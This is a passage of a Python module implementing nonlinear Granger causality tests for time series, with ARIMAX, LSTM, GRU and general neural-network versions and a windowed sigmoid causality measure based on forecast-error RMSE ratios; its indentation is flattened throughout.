# Wilcoxon signed-rank test (one-sided: |errors of the X-only model| greater than |errors of the X and Y model|)
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print('lag=%d' %lag)
print("Statistics value =", S,"p-value =", p_value)
if plot:
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY,
RSSX, RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
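#%% Usage sketch (NN, illustrative)
# A hedged sketch of calling nonlincausalityNN with the architecture from
# Example 1 of the docstring (NN_config = ['l','dr','d'], NN_neurons = [100, 0.1, 30]).
# The helper name _demo_nonlincausalityNN, the synthetic data and all parameter
# values are illustrative assumptions, not part of the original API.
def _demo_nonlincausalityNN():
    np.random.seed(1)
    n = 600
    y = np.random.randn(n)
    x_sig = np.zeros(n)
    for t in range(3, n):
        # X depends nonlinearly on its own past and on Y lagged by 3 samples
        x_sig[t] = 0.4*x_sig[t-1] + 0.7*np.sin(y[t-3]) + 0.1*np.random.randn()
    data = np.vstack([x_sig, y]).T  # column 0 = X, column 1 = Y
    return nonlincausalityNN(data[:500], maxlag=[3], NN_config=['l', 'dr', 'd'],
                             NN_neurons=[100, 0.1, 30], run=1, xtest=data[500:],
                             epochs_num=[20], learning_rate=[0.01],
                             batch_size_num=32, verbose=False, plot=False)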
#%% ARIMAX
def nonlincausalityARIMAX(x, maxlag, d, xtest=[], z=[], ztest=[],plot = False):
'''
This function is an implementation of a modified Granger causality test. Classical Granger causality uses linear autoregression for testing causality;
in this function the forecasting is made using an ARIMAX model.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
d - int, the differencing order for the ARIMAX models.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing the hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing the hypothesis.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary keyed by the number of lags used. Each key stores a list, which contains the test results, the model for prediction of X fitted only on the X time series,
the model for prediction of X fitted on the X and Y time series, the RSS of both models and the forecast errors of both models.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy.ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy.ndarray.')
# Checking if d has correct type and value
if type(d) is not int:
raise TypeError('d should be an integer.')
elif d<0:
raise ValueError('d should be a nonnegative integer.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest should have 2 columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif len(z)>0 and ztest==[] and isxtest==False:
ztest=z
elif len(z)>0 and ztest==[] and isxtest==True:
raise Exception('ztest should be set if xtest is set.')
elif ztest != []:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
results = dict()
# Creating ARIMAX models and testing for causality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal that will be forecast
length = x.shape[0]
Y = np.zeros([x.shape[0]-lag,lag]) # exogenous variable
for i in range(length-lag):
Y[i,:] = x[i:i+lag,1] # each row contains the lag values of Y preceding the value in the corresponding row of X
if z==[]:
modelX = ARIMA(X, order=(lag,d,lag))
modelXY = ARIMA(X, exog = Y, order=(lag,d,lag))
else:
z1 = np.zeros([z.shape[0]-lag,z.shape[1]*lag])
for i in range(length-lag):
z1[i,:] = z[i:i+lag,:].reshape(1,-1) # each row contains the lag values of z preceding the value in the corresponding row of X
modelX = ARIMA(X, exog = z1,order=(lag,d,lag))
zY = np.zeros([z.shape[0],z.shape[1]+1])
zY[:,0] = x[:,1]
zY[:,1:] = z[:,:]
zY_1 = np.zeros([zY.shape[0]-lag,zY.shape[1]*lag])
for i in range(length-lag):
zY_1[i,:] = zY[i:i+lag,:].reshape(1,-1) # each row contains the lag values of Y and z preceding the value in the corresponding row of X
modelXY = ARIMA(X, exog = zY_1, order=(lag,d,lag))
model_fitX = modelX.fit()
model_fitXY = modelXY.fit()
if z==[]:
length_test = xtest.shape[0]
Ytest = np.zeros([xtest.shape[0]-lag,lag]) # exogenous variable
for i in range(length_test-lag):
Ytest[i,:] = xtest[i:i+lag,1] # each row contains the lag values of Y preceding the value in the corresponding row of X
model_fitX = model_fitX.apply(xtest[lag:,0])
model_fitXY = model_fitXY.apply(xtest[lag:,0], exog = Ytest)
else:
length_test = xtest.shape[0]
ztest_1 = np.zeros([ztest.shape[0]-lag,ztest.shape[1]*lag])
for i in range(length_test-lag):
ztest_1[i,:] = ztest[i:i+lag,:].reshape(1,-1) # each row contains the lag values of z preceding the value in the corresponding row of X
zYt = np.zeros([ztest.shape[0],ztest.shape[1]+1])
zYt[:,0] = xtest[:,1]
zYt[:,1:] = ztest[:,:]
zYtest = np.zeros([ztest.shape[0]-lag,zYt.shape[1]*lag])
for i in range(length_test-lag):
zYtest[i,:] = zYt[i:i+lag,:].reshape(1,-1) # each row contains the lag values of Y and z preceding the value in the corresponding row of X
model_fitX = model_fitX.apply(xtest[lag:,0], exog = ztest_1)
model_fitXY = model_fitXY.apply(xtest[lag:,0], exog = zYtest)
XpredX = model_fitX.predict(typ='levels')
XYpredX = model_fitXY.predict(typ='levels')
X_test = xtest[lag:,0]
errorX = X_test-XpredX
errorXY = X_test-XYpredX
RSS1 = sum(errorX**2)
RSS2 = sum(errorXY**2)
# Testing for statistically smaller forecast errors of the model which includes both X and Y
# Wilcoxon signed-rank test
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
if plot:
plt.figure(figsize=(10,7))
plt.plot(np.linspace(0,len(X_test),len(X_test)),X_test)
plt.plot(np.linspace(0,len(XpredX),len(XpredX)),XpredX)
plt.plot(np.linspace(0,len(XYpredX),len(XYpredX)),XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
print('lag=%d' %lag)
print("Statistics value =", S,"p-value =", p_value)
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, model_fitX, model_fitXY, RSS1, RSS2, errorX, errorXY],
['test results','model including X', 'model including X and Y',
'RSS of model based only on X', 'RSS of model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
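# A minimal usage sketch of the test above (hypothetical data; all names below
# are illustrative and the argument order follows the call used inside
# nonlincausalitymeasureARIMAX further down in this module):
#
#   x = np.random.randn(500, 2)              # column 0 = X, column 1 = Y
#   res = nonlincausalityARIMAX(x, 5, 1)     # maxlag=5, d=1
#   S, p_value = res[5][0][0]['Wilcoxon test'][0]
#
# A small p-value indicates that the model using the past of both X and Y
# forecasts X with statistically smaller absolute errors than the model
# using the past of X alone.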
#%% Measure LSTM
def nonlincausalitymeasureLSTM(x, maxlag, w1, w2, LSTM_layers, LSTM_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function uses a modified Granger causality test to examine mutual causality in 2 or more time series.
It uses the nonlincausalityLSTM function for creating the prediction models.
A measure of causality is derived from these models as a sigmoid function
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
where
RMSE1 is the root mean square error obtained from the model using only the past of X to predict X,
RMSE2 is the root mean square error obtained from the model using the past of X and Y to predict X.
RMSE is computed over windows of w1 samples, moving with a step of w2.
This function computes mutual causality for every pair of time series contained in the columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - int, the window length (number of samples) used to compute the RMSE in the measure of causality.
w2 - int, the step (in samples) between consecutive RMSE windows.
LSTM_layers - int, number of LSTM layers in the model.
LSTM_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of LSTM layers specified in LSTM_layers. The first LSTM layer has the number of neurons equal to the first element in LSTM_neurons,
the second layer has the number of neurons equal to the second element in LSTM_neurons and so on.
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing the hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is used for testing conditional causality.
In this approach, the first model forecasts the present value of X based on past values of X and z, while the second model forecasts the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing the hypothesis.
add_Dropout - boolean, if True, then a Dropout layer is added after each LSTM and Dense layer, except the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If a list, its length should be equal to the number of different learning rates used.
learning_rate - float or list, the learning rate applied during training. If a list, its length should be equal to the length of the epochs_num list.
batch_size_num - int, batch size used for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityLSTM() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
if type(w1) is int:
if w1<=0:
raise ValueError('w1 should be greater than 0')
else:
raise ValueError('w1 should be an integer')
if type(w2) is int:
if w2<=0:
raise ValueError('w2 should be greater than 0')
else:
raise ValueError('w2 should be an integer')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing the time series that will be examined in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityLSTM(xx, maxlag, LSTM_layers, LSTM_neurons, run, Dense_layers, Dense_neurons, xxtest, z, ztest, add_Dropout, Dropout_rate, epochs_num, learning_rate, batch_size_num, verbose, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict() # value of causality
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xxtest[lag:,0] # signal that will be forecast
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest[:,0].reshape(xxtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from the X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row contains the lag values preceding the value in the corresponding row of X
else:
dataXtest = np.zeros([xxtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from the X time series
for k in range(xxtest.shape[0]-lag):
dataXtest[k,:]=xxtest[k:k+lag,0] # each row contains the lag values preceding the value in the corresponding row of X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for the model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest),axis=1)
else:
xztest=xxtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from the X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:] = xztest[k:k+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(w1,T,w2)): # computing the value of causality starting from moment w1 with a step equal to w2 till the end of the time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX_res, res],['measure of change of causality', 'measure of causality for whole signal','numbers of samples at the end of the step','results from nonlincausalityLSTM function'])
return results
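# The windowed causality measure used above, shown in isolation (a minimal
# numeric sketch; rmse1 and rmse2 are illustrative placeholders for the RMSE
# of the X-only model and the X-and-Y model over a single window of w1 samples):
#
#   rmse1, rmse2 = 1.2, 1.0                       # the X-and-Y model fits better
#   vc = 2/(1 + np.exp(-(rmse1/rmse2 - 1))) - 1   # ~0.0997
#
# The measure equals 0 when both models perform equally (RMSE ratio of 1),
# grows towards 1 as the X-and-Y model outperforms, and is clipped at 0 in
# the code above whenever the X-only model is better.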
#%% Measure GRU
def nonlincausalitymeasureGRU(x, maxlag, w1, w2, GRU_layers, GRU_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function uses a modified Granger causality test to examine mutual causality in 2 or more time series.
It uses the nonlincausalityGRU function for creating the prediction models.
A measure of causality is derived from these models as a sigmoid function
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
where
RMSE1 is the root mean square error obtained from the model using only the past of X to predict X,
RMSE2 is the root mean square error obtained from the model using the past of X and Y to predict X.
RMSE is computed over windows of w1 samples, moving with a step of w2.
This function computes mutual causality for every pair of time series contained in the columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - int, the window length (number of samples) used to compute the RMSE in the measure of causality.
w2 - int, the step (in samples) between consecutive RMSE windows.
GRU_layers - int, number of GRU layers in the model.
GRU_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of GRU layers specified in GRU_layers. The first GRU layer has the number of neurons equal to the first element in GRU_neurons,
the second layer has the number of neurons equal to the second element in GRU_neurons and so on.
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing the hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is used for testing conditional causality.
In this approach, the first model forecasts the present value of X based on past values of X and z, while the second model forecasts the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing the hypothesis.
add_Dropout - boolean, if True, then a Dropout layer is added after each GRU and Dense layer, except the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If a list, its length should be equal to the number of different learning rates used.
learning_rate - float or list, the learning rate applied during training. If a list, its length should be equal to the length of the epochs_num list.
batch_size_num - int, batch size used for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityGRU() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
if type(w1) is int:
if w1<=0:
raise ValueError('w1 should be greater than 0')
else:
raise ValueError('w1 should be an integer')
if type(w2) is int:
if w2<=0:
raise ValueError('w2 should be greater than 0')
else:
raise ValueError('w2 should be an integer')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing the time series that will be examined in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityGRU(xx, maxlag, GRU_layers, GRU_neurons, run, Dense_layers, Dense_neurons, xxtest, z, ztest, add_Dropout, Dropout_rate, epochs_num, learning_rate, batch_size_num, verbose, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xxtest[lag:,0] # signal that will be forecast
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest[:,0].reshape(xxtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from the X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row contains the lag values preceding the value in the corresponding row of X
else:
dataXtest = np.zeros([xxtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from the X time series
for k in range(xxtest.shape[0]-lag):
dataXtest[k,:]=xxtest[k:k+lag,0] # each row contains the lag values preceding the value in the corresponding row of X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for the model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest),axis=1)
else:
xztest=xxtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from the X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:] = xztest[k:k+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(w1,T,w2)): # computing the value of causality starting from moment w1 with a step equal to w2 till the end of the time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX_res, res],['measure of causality with sigmoid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityGRU function'])
return results
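# The whole-signal measure stored above in VC2_res, shown in isolation (a
# minimal sketch with illustrative error vectors):
#
#   errorX  = np.array([1.0, -1.0, 2.0, -2.0])    # errors of the X-only model
#   errorXY = np.array([0.5, -0.5, 1.0, -1.0])    # errors of the X-and-Y model
#   vc2 = np.log(np.var(errorX)/np.var(errorXY))  # log(4) ~ 1.386
#
# Positive values mean that adding Y reduces the forecast error variance,
# i.e. evidence for causality in the tested direction; values near 0 mean
# no improvement.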
#%% Measure NN
def nonlincausalitymeasureNN(x, maxlag, w1, w2, NN_config, NN_neurons, run=1, xtest=[], z=[], ztest=[], epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function uses a modified Granger causality test to examine mutual causality in 2 or more time series.
It uses the nonlincausalityNN function for creating the prediction models.
A measure of causality is derived from these models as a sigmoid function
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
where
RMSE1 is the root mean square error obtained from the model using only the past of X to predict X,
RMSE2 is the root mean square error obtained from the model using the past of X and Y to predict X.
RMSE is computed over windows of w1 samples, moving with a step of w2.
This function computes mutual causality for every pair of time series contained in the columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - int, the window length (number of samples) used to compute the RMSE in the measure of causality.
w2 - int, the step (in samples) between consecutive RMSE windows.
NN_config - list, tuple or numpy ndarray. Specified subsequent layers of the neural network. List should contain only 'd', 'l', 'g' or 'dr':
'd' - Dense layer
'l' - LSTM layer
'g' - GRU layer
'dr' - Dropout layer
NN_neurons - list, tuple or numpy ndarray, where the number of elements should be equal to the number of layers in NN_config. Each value corresponds to the number of neurons in the Dense, LSTM and GRU layers and to the rate for Dropout layers.
E.g. if NN_config = ['l','dr','d'] and NN_neurons = [100, 0.1, 30], then the first layer is an LSTM layer with 100 neurons, followed by a Dropout layer with rate 0.1 and then a Dense layer with 30 neurons.
The last layer is always a Dense layer with one neuron and a linear activation function.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing the hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is used for testing conditional causality.
In this approach, the first model forecasts the present value of X based on past values of X and z, while the second model forecasts the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing the hypothesis.
epochs_num - int or list, number of epochs used for fitting the model. If a list, its length should be equal to the number of different learning rates used.
learning_rate - float or list, the learning rate applied during training. If a list, its length should be equal to the length of the epochs_num list.
batch_size_num - int, batch size used for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
